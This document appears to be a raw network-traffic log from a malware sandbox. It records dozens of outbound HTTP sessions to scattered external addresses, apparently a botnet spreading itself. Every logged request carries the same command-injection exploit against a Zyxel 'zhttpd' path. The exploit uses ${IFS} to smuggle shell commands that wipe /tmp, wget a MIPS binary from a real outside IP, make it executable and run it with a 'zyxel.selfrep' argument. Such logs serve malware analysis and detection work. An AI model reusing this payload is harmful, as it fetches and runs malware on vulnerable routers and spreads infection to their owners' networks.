                                                        Jan 28, 2024 10:12:46.288033009 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2818192.168.2.1454950165.185.22.193443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:46.288059950 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2819192.168.2.143463667.177.10.71443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:46.288094044 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2820192.168.2.1455180102.43.230.75443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:46.288126945 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2821192.168.2.1440528173.173.74.149443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:46.288165092 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2822192.168.2.1447662201.213.28.38443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:46.288199902 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2823192.168.2.1458074188.93.70.13443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:46.288244963 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2824192.168.2.144838899.102.109.35443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:46.288309097 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2825192.168.2.144884882.7.58.236443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:46.288343906 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2826192.168.2.145766285.104.46.173443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:46.288367033 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2827192.168.2.1450504109.230.48.168443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:46.288423061 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2828192.168.2.1450694154.207.86.52443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:46.288439989 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2829192.168.2.1443852221.170.22.119443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:46.288476944 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2830192.168.2.1453002156.165.222.195443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:46.288527012 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2831192.168.2.1438988111.31.181.154443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:46.288575888 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2832192.168.2.145179094.57.155.39443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:46.288610935 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2833192.168.2.1460530209.219.152.81443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:46.288655043 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2834192.168.2.1445076112.43.214.0443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:46.288686991 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2835192.168.2.1443564130.173.115.248443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:46.288722992 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2836192.168.2.1445566117.178.243.144443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:46.288759947 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2837192.168.2.146004897.212.173.79443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:46.288800955 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2838192.168.2.14566802.34.188.249443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:46.288832903 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2839192.168.2.1449410129.126.184.179443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:46.288876057 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2840192.168.2.1434722174.154.137.108443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:46.288894892 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2841192.168.2.1448786200.208.242.230443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:46.288923979 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2842192.168.2.1443684166.200.235.253443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:46.288965940 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2843192.168.2.143863876.37.193.68443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:46.288997889 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2844192.168.2.1454964223.7.119.153443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:46.289036989 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2845192.168.2.145820249.223.150.47443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:46.289066076 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2846192.168.2.144660276.65.112.168443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:46.289097071 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2847192.168.2.1437770122.91.242.205443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:46.289148092 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2848192.168.2.1457990213.126.204.148443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:46.289191008 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2849192.168.2.146028278.63.52.18443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:46.289223909 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2850192.168.2.143937664.171.35.171443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:46.289277077 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2851192.168.2.1452364136.61.253.242443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:46.289329052 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2852192.168.2.144636213.215.92.199443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:46.289367914 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2853192.168.2.145274083.145.63.41443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:46.289417028 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2854192.168.2.1457660148.188.114.8443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:46.289443016 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2855192.168.2.145788658.84.36.188443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:46.289486885 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2856192.168.2.145386648.23.111.229443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:46.289532900 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2857192.168.2.145440299.74.42.94443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:46.289582968 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2858192.168.2.145509450.138.161.22443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:46.289639950 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2859192.168.2.144615042.222.205.181443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:46.289663076 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2860192.168.2.1444546203.45.138.15443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:46.289699078 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2861192.168.2.145854675.89.29.137443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:46.289769888 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2862192.168.2.144866684.48.181.19443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:46.289784908 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2863192.168.2.145061874.128.149.73443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:46.289834023 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2864192.168.2.145722282.83.53.113443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:46.289864063 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2865192.168.2.1459534108.217.198.9443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:46.289902925 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2866192.168.2.1436260136.181.61.187443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:46.289963007 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2867192.168.2.145188887.231.17.246443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:46.289987087 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2868192.168.2.1448664195.43.44.239443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:46.290039062 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2869192.168.2.1447510158.213.43.191443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:46.290070057 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2870192.168.2.1458060116.150.162.155443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:46.290102005 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2871192.168.2.1448182171.10.212.35443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:46.290167093 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2872192.168.2.1443796128.177.242.211443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:46.290206909 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2873192.168.2.1460984175.62.48.19443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:46.290235996 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2874192.168.2.1440698128.215.42.220443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:46.290256977 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2875192.168.2.145112443.231.159.172443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:46.290302992 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2876192.168.2.145846842.195.163.7443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:46.290338039 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2877192.168.2.143883846.144.228.99443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:46.290366888 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2878192.168.2.143334473.32.62.201443
                                                        TimestampBytes transferredDirectionData
